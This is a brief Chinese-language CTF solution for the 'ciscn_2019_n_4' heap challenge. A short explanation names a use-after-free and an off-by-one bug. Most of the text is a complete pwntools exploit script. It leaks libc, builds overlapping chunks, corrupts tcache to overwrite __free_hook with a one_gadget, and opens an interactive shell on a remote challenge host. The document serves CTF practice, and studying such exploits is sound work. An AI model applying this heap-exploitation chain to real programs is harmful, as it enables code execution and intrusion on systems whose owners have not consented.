漏洞点还挺多的
uaf+off-by-one
通过uaf泄露libc,通过off-by-one达成overlap,来double free劫持free_hook即可
from pwn import * #p=process('./ciscn_2019_n_4') p=remote('node3.buuoj.cn',25496) libc=ELF('/lib/x86_64-linux-gnu/libc-2.27.so') text='Your choice :' def add(size,content): p.sendlineafter(':','1') p.sendlineafter(' ?',str(size)) p.sendlineafter('nest?',content) def edit(idx,content): p.sendlineafter(':','2') p.sendlineafter(' :',str(idx)) p.sendlineafter('nest?',content) def show(idx): p.sendlineafter(':','3') p.sendlineafter('Index :',str(idx)) def delete(idx): p.sendlineafter(':','4') p.sendlineafter('Index :',str(idx)) add(0x410,'p')#0 add(0x10,'p')#1 delete(0) add(0x18,'ppppppp')#0 show(0) print(hex(libc.symbols['__malloc_hook'])) libc.address=u64(p.recvuntil('x7f')[-6:].ljust(8,b'x00'))-1120-libc.symbols['__malloc_hook'] add(0x10,'p')#2 add(0x10,'p')#3 add(0x10,'p')#4 one=libc.address+0x4f322 free_hook=libc.symbols['__free_hook'] edit(0,b'z'*0x10+p64(0x40)+b'x81')#0 print(hex(libc.address)) delete(2) delete(3) add(0x71,b'p'*0x18+p64(0x21)+p64(free_hook))#2 delete(2) add(0x10,'p') add(0x10,p64(one)) #gdb.attach(p) p.interactive()